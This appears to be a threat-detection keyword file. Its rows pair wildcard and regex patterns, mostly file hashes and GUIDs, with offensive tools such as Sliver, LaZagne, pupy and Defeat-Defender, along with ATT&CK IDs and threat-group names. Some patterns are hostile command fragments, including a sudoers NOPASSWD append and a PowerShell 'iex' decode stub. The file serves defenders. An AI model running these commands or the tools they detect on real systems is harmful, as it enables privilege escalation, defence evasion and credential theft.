>>*.bat*",".{0,1000}echo\spowershell\s\-command\s\""start\sWinupdate\.exe\""\s\>\>.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42735" "*echo UAC.ShellExecute 
*cmd.exe*",".{0,1000}echo\sUAC\.ShellExecute\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42738" "*echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers*",".{0,1000}echo\s\'user\sALL\=\(ALL\)\sNOPASSWD\:ALL\'\s\>\>\s\/etc\/sudoers.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","42739" "*echo 'WinPwnage' *",".{0,1000}echo\s\'WinPwnage\'\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42740" "*echo:iex([System.Text.Encoding]::ASCII.GetString(*",".{0,1000}echo\:iex\(\[System\.Text\.Encoding\]\:\:ASCII\.GetString\(.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42741" "*echoac-poc-main*",".{0,1000}echoac\-poc\-main.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","42742" "*echowrecker*",".{0,1000}echowrecker.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. 
There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","42743" "*ecryptfs2john.py*",".{0,1000}ecryptfs2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","42745" "*ecs_task_def_data/all_task_def.txt*",".{0,1000}ecs_task_def_data\/all_task_def\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","42746" "*ed026677076b2698d11c46ffe8389c79069301b985c0c7ed50bcb84c09d28861*",".{0,1000}ed026677076b2698d11c46ffe8389c79069301b985c0c7ed50bcb84c09d28861.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42747" "*ed05f1f81000737f45d7e490a10f3b8c36b0cf898b51fe1966ce63f034e8ffcf*",".{0,1000}ed05f1f81000737f45d7e490a10f3b8c36b0cf898b51fe1966ce63f034e8ffcf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42749" "*ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa*",".{0,1000}ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42751" "*ed0a5937431223b74f639b0446fb35e05cd86cef2a752d5dd53d46555cee5e9b*",".{0,1000}ed0a5937431223b74f639b0446fb35e05cd86cef2a752d5dd53d46555cee5e9b.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","42752" "*ed0baea4cf8c5e3a0dce2db731ab38e324ce9db4269952fd9b90dc007c5d4291*",".{0,1000}ed0baea4cf8c5e3a0dce2db731ab38e324ce9db4269952fd9b90dc007c5d4291.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","42753" 
"*ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470*",".{0,1000}ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42754" "*ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84*",".{0,1000}ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42755" "*ed1041a720c35f70b8354bfda4e020525553da2ae1c83dd166388c9c66522a8d*",".{0,1000}ed1041a720c35f70b8354bfda4e020525553da2ae1c83dd166388c9c66522a8d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42756" "*ed12460f0823550d20f0ecef4c0fd8007b0ac864aa005c996b62ead068c6952d*",".{0,1000}ed12460f0823550d20f0ecef4c0fd8007b0ac864aa005c996b62ead068c6952d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42757" "*Ed1s0nZ/cool/*",".{0,1000}Ed1s0nZ\/cool\/.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","42760" "*ed249df13376f8a9e1aa823772cb075c96d1876651927b239c18d665bfa39666*",".{0,1000}ed249df13376f8a9e1aa823772cb075c96d1876651927b239c18d665bfa39666.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation 
tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","42761" "*ed2e54a7a57637f150701a4764bbece4af4bcbc563b9a0e61c017146b3bed284*",".{0,1000}ed2e54a7a57637f150701a4764bbece4af4bcbc563b9a0e61c017146b3bed284.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42764" "*ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56*",".{0,1000}ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","42765" "*ed37fced451d290d9c5fa54fcf535408a01172a50ac8ad6a560e576b1f232802*",".{0,1000}ed37fced451d290d9c5fa54fcf535408a01172a50ac8ad6a560e576b1f232802.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42766" "*ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947*",".{0,1000}ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42767" "*ed47878048a7624cdd5a73042c9bde820aa0befbb1908c3f2e4a1cbe5aad359f*",".{0,1000}ed47878048a7624cdd5a73042c9bde820aa0befbb1908c3f2e4a1cbe5aad359f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42768" "*ed49a8c71ef4b0d5e362b0c4466f4c3cce1a8d2f641b6b994f949a144df30b76*",".{0,1000}ed49a8c71ef4b0d5e362b0c4466f4c3cce1a8d2f641b6b994f949a144df30b76.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42769" "*ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb*",".{0,1000}ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - 
T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42770" "*ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d*",".{0,1000}ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42772" "*ed59f3c5302dd8054c6f95575b26e7bb6365eb2d167ba97f6d8ee3bc5638dd57*",".{0,1000}ed59f3c5302dd8054c6f95575b26e7bb6365eb2d167ba97f6d8ee3bc5638dd57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42773" "*ed5c0c94ccd4fb0029dbfc609f8fc57580856648a188f595134f12c28ed97490*",".{0,1000}ed5c0c94ccd4fb0029dbfc609f8fc57580856648a188f595134f12c28ed97490.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","42774" 
"*ed627e5d0ac3faff24ef080462ada798749c5d7a9ecd6ffda2b2e14251de3784*",".{0,1000}ed627e5d0ac3faff24ef080462ada798749c5d7a9ecd6ffda2b2e14251de3784.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42775" "*ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3*",".{0,1000}ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42776" "*ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235*",".{0,1000}ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42777" "*ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1*",".{0,1000}ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42779" "*ed8071b56d96c49d5c8b0500eb9a3a946e9d60846190ef8f33de873d23d0824e*",".{0,1000}ed8071b56d96c49d5c8b0500eb9a3a946e9d60846190ef8f33de873d23d0824e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42780" "*ED839154-90D8-49DB-8CDD-972D1A6B2CFD*",".{0,1000}ED839154\-90D8\-49DB\-8CDD\-972D1A6B2CFD.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#GUIDproject","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","42781" "*ED83E265-D48E-4B0D-8C22-D9D0A67C78F2*",".{0,1000}ED83E265\-D48E\-4B0D\-8C22\-D9D0A67C78F2.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#GUIDproject","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","42782" "*ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c*",".{0,1000}ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42783" "*ed87362886559097875401d60cbcb440d8cf6da80ad5a6cc36aa0e679ce7c0a6*",".{0,1000}ed87362886559097875401d60cbcb440d8cf6da80ad5a6cc36aa0e679ce7c0a6.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42784" "*ed8aaac54cc040340e0bdb1fd8396c72399c26e8385c9778558378bdf3bd8ac4*",".{0,1000}ed8aaac54cc040340e0bdb1fd8396c72399c26e8385c9778558378bdf3bd8ac4.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","42785" 
"*ed937bcd5dc05f1021aa83afdb47af266083ef47228e23a32292bad577c53191*",".{0,1000}ed937bcd5dc05f1021aa83afdb47af266083ef47228e23a32292bad577c53191.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","42787" "*ed97a4ca8acde3b070985013333896a1c55fb5387233c2fdbefafeed2ccb9c74*",".{0,1000}ed97a4ca8acde3b070985013333896a1c55fb5387233c2fdbefafeed2ccb9c74.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42788" "*ed985694d5443f8df91836bf904b8ef8c360edbbda34b6cc50d454edcf1197b3*",".{0,1000}ed985694d5443f8df91836bf904b8ef8c360edbbda34b6cc50d454edcf1197b3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42789" "*ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c*",".{0,1000}ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42790" "*ed99b1d4757d0848ced6b91f18326c42127f6f79ad1cc7e7fafeee91388004e3*",".{0,1000}ed99b1d4757d0848ced6b91f18326c42127f6f79ad1cc7e7fafeee91388004e3.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","#filehash","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","42791" "*ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54*",".{0,1000}ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential 